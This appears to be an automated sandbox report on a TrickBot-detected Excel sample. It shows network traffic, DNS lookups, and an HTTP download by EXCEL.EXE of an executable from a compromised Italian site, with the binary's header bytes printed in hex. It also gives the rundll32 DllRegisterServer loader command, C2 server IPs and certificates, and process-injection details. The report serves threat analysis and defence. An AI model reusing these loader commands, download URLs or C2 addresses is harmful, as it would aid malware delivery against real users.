                                                                                                                                                                                    Feb 20, 2021 03:20:08.414331913 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.474250078 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481328964 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481429100 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481479883 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481518030 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481558084 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481574059 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481597900 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481610060 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481630087 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481636047 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481659889 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481674910 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481714010 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481718063 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481760979 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481762886 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481779099 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481812000 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.492059946 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539288044 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539355993 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539396048 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539438963 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539478064 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539500952 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539526939 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539537907 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539544106 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539549112 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539571047 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539593935 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539609909 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539634943 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539649010 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539689064 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539702892 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539715052 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539727926 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539743900 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539767027 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539788008 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539805889 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539829969 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539854050 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539897919 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539904118 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539912939 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539935112 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539958000 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539974928 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.539998055 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540013075 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540030956 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540050983 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540076971 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540091038 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540107012 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.540149927 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.541318893 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597528934 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597590923 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597634077 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597673893 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597676039 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597703934 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597707987 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597712994 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597724915 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597753048 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597764969 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597790956 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597803116 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597830057 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597841024 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597868919 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597879887 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597915888 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597920895 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597958088 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597970009 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.597996950 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598009109 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598036051 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598047018 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598074913 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598087072 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598113060 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598124981 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598151922 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598164082 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598191023 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598202944 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598238945 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598261118 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.598306894 CET4916580192.168.2.22185.81.0.78

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Feb 20, 2021 03:20:08.290577888 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                    Feb 20, 2021 03:20:08.341211081 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:21:03.812624931 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                    Feb 20, 2021 03:21:03.874272108 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:21:03.890100956 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                    Feb 20, 2021 03:21:03.948726892 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:22:17.945517063 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                    Feb 20, 2021 03:22:17.997308969 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:22:17.999011040 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                    Feb 20, 2021 03:22:18.059031010 CET53495488.8.8.8192.168.2.22

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                    Feb 20, 2021 03:20:08.290577888 CET192.168.2.228.8.8.80x2c09Standard query (0)www.chipmania.itA (IP address)IN (0x0001)
                                                                                                                                                                                    Feb 20, 2021 03:22:17.945517063 CET192.168.2.228.8.8.80x758fStandard query (0)ident.meA (IP address)IN (0x0001)
                                                                                                                                                                                    Feb 20, 2021 03:22:17.999011040 CET192.168.2.228.8.8.80xa016Standard query (0)ident.meA (IP address)IN (0x0001)

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                    Feb 20, 2021 03:20:08.341211081 CET8.8.8.8192.168.2.220x2c09No error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                    Feb 20, 2021 03:20:08.341211081 CET8.8.8.8192.168.2.220x2c09No error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)
                                                                                                                                                                                    Feb 20, 2021 03:22:17.997308969 CET8.8.8.8192.168.2.220x758fNo error (0)ident.me176.58.123.25A (IP address)IN (0x0001)
                                                                                                                                                                                    Feb 20, 2021 03:22:18.059031010 CET8.8.8.8192.168.2.220xa016No error (0)ident.me176.58.123.25A (IP address)IN (0x0001)

                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                    • www.chipmania.it

                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    0192.168.2.2249165185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Feb 20, 2021 03:20:08.414331913 CET0OUTGET /mails/open.php HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                    Host: www.chipmania.it
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Feb 20, 2021 03:20:08.481328964 CET2INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Sat, 20 Feb 2021 02:20:08 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Disposition: attachment; filename="8.jjkes"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, Keep-Alive
                                                                                                                                                                                    Keep-Alive: timeout=1, max=100
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc b8
                                                                                                                                                                                    Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                    Feb 20, 2021 03:21:03.228493929 CET142.202.191.164443192.168.2.2249168CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZCN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZThu Oct 01 03:17:34 CEST 2020Sun Sep 29 03:17:34 CEST 2030769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                                    Feb 20, 2021 03:21:05.757544041 CET45.155.173.242443192.168.2.2249170CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZCN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZThu Oct 01 03:17:34 CEST 2020Sun Sep 29 03:17:34 CEST 2030769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f

                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                    Statistics

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:03:19:33
                                                                                                                                                                                    Start date:20/02/2021
                                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                    Imagebase:0x13f2d0000
                                                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:03:19:38
                                                                                                                                                                                    Start date:20/02/2021
                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                    Imagebase:0xffba0000
                                                                                                                                                                                    File size:45568 bytes
                                                                                                                                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:03:19:38
                                                                                                                                                                                    Start date:20/02/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                    File size:44544 bytes
                                                                                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2082507822.0000000000684000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2082501308.0000000000684000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2086800503.00000000008C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2086715316.0000000000650000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2086590346.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:03:19:40
                                                                                                                                                                                    Start date:20/02/2021
                                                                                                                                                                                    Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                    Imagebase:0xffcb0000
                                                                                                                                                                                    File size:50688 bytes
                                                                                                                                                                                    MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:03:19:40
                                                                                                                                                                                    Start date:20/02/2021
                                                                                                                                                                                    Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                    Imagebase:0xffcb0000
                                                                                                                                                                                    File size:50688 bytes
                                                                                                                                                                                    MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                    Reset < >